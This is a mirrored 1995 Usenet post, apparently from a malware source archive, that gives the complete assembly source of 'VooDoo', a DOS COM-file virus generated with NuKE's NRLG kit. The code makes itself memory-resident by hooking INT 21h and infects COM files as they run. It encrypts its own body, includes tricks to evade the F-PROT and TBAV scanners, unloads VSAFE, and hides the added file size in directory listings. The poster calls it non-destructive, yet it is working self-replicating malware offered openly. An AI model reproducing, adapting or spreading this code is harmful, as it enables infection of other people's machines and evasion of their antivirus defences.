mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
484 lines
23 KiB
NASM
484 lines
23 KiB
NASM
From smtp Thu Feb 9 11:43 EST 1995
|
|
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Thu, 9 Feb 95 11:43 EST
|
|
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
|
|
id LAA03601 for joshuaw@pobox.jwu.edu; Thu, 9 Feb 1995 11:34:53 -0500
|
|
Date: Thu, 9 Feb 1995 11:34:53 -0500
|
|
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
|
|
Content-Length: 23204
|
|
Content-Type: binary
|
|
Message-Id: <199502091634.LAA03601@lynx.dac.neu.edu>
|
|
To: pobox.jwu.edu!joshuaw
|
|
Subject: (fwd) Re: Not-So-Destructive Virii...<post please>
|
|
Newsgroups: alt.comp.virus
|
|
Status: RO
|
|
|
|
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!usenet.cis.ufl.edu!caen!uwm.edu!news.moneng.mei.com!howland.reston.ans.net!nntp.crl.com!crl.crl.com!not-for-mail
|
|
From: yojimbo@crl.com (Douglas Mauldin)
|
|
Newsgroups: alt.comp.virus
|
|
Subject: Re: Not-So-Destructive Virii...<post please>
|
|
Date: 6 Feb 1995 21:44:13 -0800
|
|
Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]
|
|
Lines: 450
|
|
Message-ID: <3h71bd$js1@crl.crl.com>
|
|
References: <3h5ubg$4s7@usenet.srv.cis.pitt.edu>
|
|
NNTP-Posting-Host: crl.com
|
|
X-Newsreader: TIN [version 1.2 PL2]
|
|
|
|
; Here's a simple, non-destructive virus created with NRLG (NuKE Randomic
|
|
; Life Generator). All it does is display a message on June 6th ( I believe).
|
|
|
|
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
|
|
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
|
|
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
|
|
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
|
|
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
|
|
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
|
|
.286
|
|
code segment
|
|
assume cs:code,ds:code
|
|
org 100h
|
|
|
|
start: CALL NEXT
|
|
|
|
NEXT:
|
|
mov di,sp ;take the stack pointer location
|
|
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
|
|
sub bp,offset next ;subtract the large code off this code
|
|
;
|
|
;*******************************************************************
|
|
; #1 DECRYPT ROUTINE
|
|
;*******************************************************************
|
|
|
|
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
|
|
je crypt2 ;yes! not decrypt
|
|
;----------------------------------------------------------
|
|
mov cx,offset fin ;cx = large of virus
|
|
lea di,[offset crypt]+ bp ;di = first byte to decrypt
|
|
mov dx,1 ;dx = value for decrypt
|
|
;----------------------------------------------------------
|
|
deci: ;deci = fuck label!
|
|
;----------------------------------------------------------
|
|
|
|
ÿinc byte ptr [di]
|
|
sub word ptr [di],0381h
|
|
ÿinc di
|
|
inc di
|
|
;----------------------------------------------------------
|
|
jmp bye ;######## BYE BYE F-PROT ! ##########
|
|
mov ah,4ch
|
|
int 21h
|
|
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
|
|
;-----------------------------------------------------------
|
|
mov ah,0bh ;######### BYE BYE TBAV ! ##########
|
|
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
|
|
;----------------------------------------------------------
|
|
loop deci ;repeat please!
|
|
;
|
|
;*****************************************************************
|
|
; #2 DECRYPT ROUTINE
|
|
;*****************************************************************
|
|
;
|
|
crypt: ;fuck label!
|
|
;
|
|
mov cx,offset fin ;cx = large of virus
|
|
lea di,[offset crypt2] + bp ;di = first byte to decrypt
|
|
;---------------------------------------------------------------
|
|
deci2: ;
|
|
xor byte ptr cs:[di],1 ;decrytion rutine
|
|
inc di ;very simple...
|
|
loop deci2 ;
|
|
;---------------------------------------------------------------
|
|
crypt2: ;fuck label!
|
|
;
|
|
MOV AX,0CACAH ;call to my resident interrup mask
|
|
INT 21H ;for chek "I'm is residet?"
|
|
CMP Bh,0CAH ;is equal to CACA?
|
|
JE PUM2 ;yes! jump to runnig program
|
|
call action
|
|
;*****************************************************************
|
|
; NRLG FUNCTIONS (SELECTABLE)
|
|
;*****************************************************************
|
|
|
|
ÿcall ANTI_V
|
|
;****************************************************************
|
|
; PROCESS TO REMAIN RESIDENT
|
|
;****************************************************************
|
|
|
|
mov ax,3521h
|
|
int 21h ;store the int 21 vectors
|
|
mov word ptr [bp+int21],bx ;in cs:int21
|
|
mov word ptr [bp+int21+2],es ;
|
|
;---------------------------------------------------------------
|
|
push cs ;
|
|
pop ax ;ax = my actual segment
|
|
dec ax ;dec my segment for look my MCB
|
|
mov es,ax ;
|
|
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
|
|
;---------------------------------------------------------------
|
|
push cs ;
|
|
pop es ;
|
|
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
|
|
sub bx,17 + offset fin ;and 100H for the PSP total
|
|
mov ah,4ah ;used memory
|
|
int 21h ;put the new value to MCB
|
|
;---------------------------------------------------------------
|
|
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
|
|
mov ah,48h ;
|
|
int 21h ;request the memory to fuck DOS!
|
|
;---------------------------------------------------------------
|
|
dec ax ;ax=new segment
|
|
mov es,ax ;ax-1= new segment MCB
|
|
mov byte ptr es:[1],8 ;put '8' in the segment
|
|
;--------------------------------------------------------------
|
|
inc ax ;
|
|
mov es,ax ;es = new segment
|
|
lea si,[bp + offset start] ;si = start of virus
|
|
mov di,100h ;di = 100H (psp position)
|
|
mov cx,offset fin - start ;cx = lag of virus
|
|
push cs ;
|
|
pop ds ;ds = cs
|
|
cld ;mov the code
|
|
rep movsb ;ds:si >> es:di
|
|
;--------------------------------------------------------------
|
|
mov dx,offset virus ;dx = new int21 handler
|
|
mov ax,2521h ;
|
|
push es ;
|
|
pop ds ;
|
|
int 21h ;set the vectors
|
|
;-------------------------------------------------------------
|
|
pum2: ;
|
|
;
|
|
mov ah,byte ptr [cs:bp + real] ;restore the 3
|
|
mov byte ptr cs:[100h],ah ;first bytes
|
|
mov ax,word ptr [cs:bp + real + 1] ;
|
|
mov word ptr cs:[101h],ax ;
|
|
;-------------------------------------------------------------
|
|
mov ax,100h ;
|
|
jmp ax ;jmp to execute
|
|
;
|
|
;*****************************************************************
|
|
;* HANDLER FOR THE INT 21H
|
|
;*****************************************************************
|
|
;
|
|
VIRUS: ;
|
|
;
|
|
cmp ah,4bh ;is a 4b function?
|
|
je REPRODUCCION ;yes! jump to reproduce !
|
|
cmp ah,11h
|
|
je dir
|
|
cmp ah,12h
|
|
je dir
|
|
dirsal:
|
|
cmp AX,0CACAH ;is ... a caca function? (resident chek)
|
|
jne a3 ;no! jump to a3
|
|
mov bh,0cah ;yes! put ca in bh
|
|
a3: ;
|
|
JMP dword ptr CS:[INT21] ;jmp to original int 21h
|
|
ret ;
|
|
make db '[NuKE] N.R.L.G. AZRAEL'
|
|
dir:
|
|
jmp dir_s
|
|
;-------------------------------------------------------------
|
|
REPRODUCCION: ;
|
|
;
|
|
pushf ;put the register
|
|
pusha ;in the stack
|
|
push si ;
|
|
push di ;
|
|
push bp ;
|
|
push es ;
|
|
push ds ;
|
|
;-------------------------------------------------------------
|
|
push cs ;
|
|
pop ds ;
|
|
mov ax,3524H ;get the dos error control
|
|
int 21h ;interupt
|
|
mov word ptr error,es ;and put in cs:error
|
|
mov word ptr error+2,bx ;
|
|
mov ax,2524H ;change the dos error control
|
|
mov dx,offset all ;for my "trap mask"
|
|
int 21h ;
|
|
;-------------------------------------------------------------
|
|
pop ds ;
|
|
pop es ;restore the registers
|
|
pop bp ;
|
|
pop di ;
|
|
pop si ;
|
|
popa ;
|
|
popf ;
|
|
;-------------------------------------------------------------
|
|
pushf ;put the registers
|
|
pusha ;
|
|
push si ;HEY! AZRAEL IS CRAZY?
|
|
push di ;PUSH, POP, PUSH, POP
|
|
push bp ;PLEEEEEAAAAAASEEEEEEEEE
|
|
push es ;PURIFY THIS SHIT!
|
|
push ds ;
|
|
;-------------------------------------------------------------
|
|
mov ax,4300h ;
|
|
int 21h ;get the file
|
|
mov word ptr cs:[attrib],cx ;atributes
|
|
;-------------------------------------------------------------
|
|
mov ax,4301h ;le saco los atributos al
|
|
xor cx,cx ;file
|
|
int 21h ;
|
|
;-------------------------------------------------------------
|
|
mov ax,3d02h ;open the file
|
|
int 21h ;for read/write
|
|
mov bx,ax ;bx=handle
|
|
;-------------------------------------------------------------
|
|
mov ax,5700h ;
|
|
int 21h ;get the file date
|
|
mov word ptr cs:[hora],cx ;put the hour
|
|
mov word ptr cs:[dia],dx ;put the day
|
|
and cx,word ptr cs:[fecha] ;calculate the seconds
|
|
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
|
|
jne seguir ;yes! the file is infected!
|
|
jmp cerrar ;
|
|
;------------------------------------------------------------
|
|
seguir: ;
|
|
mov ax,4202h ;move the pointer to end
|
|
call movedor ;of the file
|
|
;------------------------------------------------------------
|
|
push cs ;
|
|
pop ds ;
|
|
sub ax,3 ;calculate the
|
|
mov word ptr [cs:largo],ax ;jmp long
|
|
;-------------------------------------------------------------
|
|
mov ax,04200h ;move the pointer to
|
|
call movedor ;start of file
|
|
;----------------------------------------------------------
|
|
push cs ;
|
|
pop ds ;read the 3 first bytes
|
|
mov ah,3fh ;
|
|
mov cx,3 ;
|
|
lea dx,[cs:real] ;put the bytes in cs:[real]
|
|
int 21h ;
|
|
;----------------------------------------------------------
|
|
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
|
|
jne er1 ;yes! is a EXE... fuckkk!
|
|
;----------------------------------------------------------
|
|
jmp cerrar
|
|
er1:
|
|
;----------------------------------------------------------
|
|
mov ax,4200h ;move the pointer
|
|
call movedor ;to start fo file
|
|
;----------------------------------------------------------
|
|
push cs ;
|
|
pop ds ;
|
|
mov ah,40h ;
|
|
mov cx,1 ;write the JMP
|
|
lea dx,[cs:jump] ;instruccion in the
|
|
int 21h ;fist byte of the file
|
|
;----------------------------------------------------------
|
|
mov ah,40h ;write the value of jmp
|
|
mov cx,2 ;in the file
|
|
lea dx,[cs:largo] ;
|
|
int 21h ;
|
|
;----------------------------------------------------------
|
|
mov ax,04202h ;move the pointer to
|
|
call movedor ;end of file
|
|
;----------------------------------------------------------
|
|
push cs ;
|
|
pop ds ;move the code
|
|
push cs ;of my virus
|
|
pop es ;to cs:end+50
|
|
cld ;for encrypt
|
|
mov si,100h ;
|
|
mov di,offset fin + 50 ;
|
|
mov cx,offset fin - 100h ;
|
|
rep movsb ;
|
|
;----------------------------------------------------------
|
|
mov cx,offset fin
|
|
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
|
|
enc: ;
|
|
xor byte ptr cs:[di],1 ;encrypt the virus
|
|
inc di ;code
|
|
loop enc ;
|
|
;---------------------------------------------------------
|
|
mov cx,offset fin
|
|
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
|
|
mov dx,1
|
|
enc2: ;
|
|
|
|
ÿadd word ptr [di],0381h
|
|
dec byte ptr [di]
|
|
ÿinc di
|
|
inc di ;the virus code
|
|
loop enc2 ;
|
|
;--------------------------------------------
|
|
mov ah,40h ;
|
|
mov cx,offset fin - offset start ;copy the virus
|
|
mov dx,offset fin + 50 ;to end of file
|
|
int 21h ;
|
|
;----------------------------------------------------------
|
|
cerrar: ;
|
|
;restore the
|
|
mov ax,5701h ;date and time
|
|
mov cx,word ptr cs:[hora] ;file
|
|
mov dx,word ptr cs:[dia] ;
|
|
or cx,word ptr cs:[fecha] ;and mark the seconds
|
|
int 21h ;
|
|
;----------------------------------------------------------
|
|
mov ah,3eh ;
|
|
int 21h ;close the file
|
|
;----------------------------------------------------------
|
|
pop ds ;
|
|
pop es ;restore the
|
|
pop bp ;registers
|
|
pop di ;
|
|
pop si ;
|
|
popa ;
|
|
popf ;
|
|
;----------------------------------------------------------
|
|
pusha ;
|
|
;
|
|
mov ax,4301h ;restores the atributes
|
|
mov cx,word ptr cs:[attrib] ;of the file
|
|
int 21h ;
|
|
;
|
|
popa ;
|
|
;----------------------------------------------------------
|
|
pushf ;
|
|
pusha ; 8-( = f-prot
|
|
push si ;
|
|
push di ; 8-( = tbav
|
|
push bp ;
|
|
push es ; 8-) = I'm
|
|
push ds ;
|
|
;----------------------------------------------------------
|
|
mov ax,2524H ;
|
|
lea bx,error ;restore the
|
|
mov ds,bx ;errors handler
|
|
lea bx,error+2 ;
|
|
int 21h ;
|
|
;----------------------------------------------------------
|
|
pop ds ;
|
|
pop es ;
|
|
pop bp ;restore the
|
|
pop di ;resgisters
|
|
pop si ;
|
|
popa ;
|
|
popf ;
|
|
;----------------------------------------------------------
|
|
JMP A3 ;jmp to orig. INT 21
|
|
;
|
|
;**********************************************************
|
|
; SUBRUTINES AREA
|
|
;**********************************************************
|
|
;
|
|
movedor: ;
|
|
;
|
|
xor cx,cx ;use to move file pointer
|
|
xor dx,dx ;
|
|
int 21h ;
|
|
ret ;
|
|
;----------------------------------------------------------
|
|
all: ;
|
|
;
|
|
XOR AL,AL ;use to set
|
|
iret ;error flag
|
|
|
|
;***********************************************************
|
|
; DATA AREA
|
|
;***********************************************************
|
|
largo dw ?
|
|
jump db 0e9h
|
|
real db 0cdh,20h,0
|
|
hora dw ?
|
|
dia dw ?
|
|
attrib dw ?
|
|
int21 dd ?
|
|
error dd ?
|
|
|
|
ÿ;---------------------------------
|
|
action: ;Call label
|
|
MOV AH,2AH ;
|
|
INT 21H ;get date
|
|
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
|
|
JE cont ;nop! fuck ret
|
|
cmp byte ptr cs:[action_dia+bp],32 ;
|
|
jne no_day ;
|
|
cont: ;
|
|
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
|
|
je set ;
|
|
cmp byte ptr cs:[action_mes+bp],13 ;
|
|
jne NO_DAY ;nop! fuck ret
|
|
set: ;
|
|
mov AH,9 ;yeah!!
|
|
MOV DX,OFFSET PAO ;print my text!
|
|
INT 21H ;now!
|
|
INT 20H ;an finsh te program
|
|
NO_DAY: ;label to incorrect date
|
|
ret ;return from call
|
|
;---------------------------------
|
|
|
|
ÿ
|
|
PAO:
|
|
DB 10,13,'Congratulations! You Have Been infected by VooDoo... Compliments of HeadHunter ','$'
|
|
|
|
;---------------------------------
|
|
ANTI_V: ;
|
|
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
|
|
MOV DX,5945H ;
|
|
INT 21H ;
|
|
ret ;
|
|
;---------------------------------
|
|
|
|
ÿ;*****************************************************
|
|
dir_s:
|
|
pushf
|
|
push cs
|
|
call a3 ;Get file Stats
|
|
test al,al ;Good FCB?
|
|
jnz no_good ;nope
|
|
push ax
|
|
push bx
|
|
push es
|
|
mov ah,51h ;Is this Undocmented? huh...
|
|
int 21h
|
|
mov es,bx
|
|
cmp bx,es:[16h]
|
|
jnz not_infected
|
|
mov bx,dx
|
|
mov al,[bx]
|
|
push ax
|
|
mov ah,2fh ;Get file DTA
|
|
int 21h
|
|
pop ax
|
|
inc al
|
|
jnz fcb_okay
|
|
add bx,7h
|
|
fcb_okay: mov ax,es:[bx+17h]
|
|
and ax,1fh ;UnMask Seconds Field
|
|
xor al,byte ptr cs:fechad
|
|
jnz not_infected
|
|
and byte ptr es:[bx+17h],0e0h
|
|
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
|
|
sbb es:[bx+1fh],ax
|
|
not_infected:pop es
|
|
pop bx
|
|
pop ax
|
|
no_good: iret
|
|
;********************************************************************
|
|
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
|
|
;*********************************************************************
|
|
|
|
ÿaction_dia Db 06H ;day for the action
|
|
action_mes Db 06H ;month for the action
|
|
FECHA DW 01eH ;Secon for mark
|
|
FECHAd Db 01eH ;Secon for mark dir st
|
|
fin:
|
|
code ends
|
|
end start
|
|
|
|
|
|
--
|
|
Eric "Mad Dog" Kilby maddog@ccs.neu.edu
|
|
The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu
|
|
Student at the Northeatstern University College of Computer Science
|
|
"I Can't Believe It's Not Butter"
|
|
|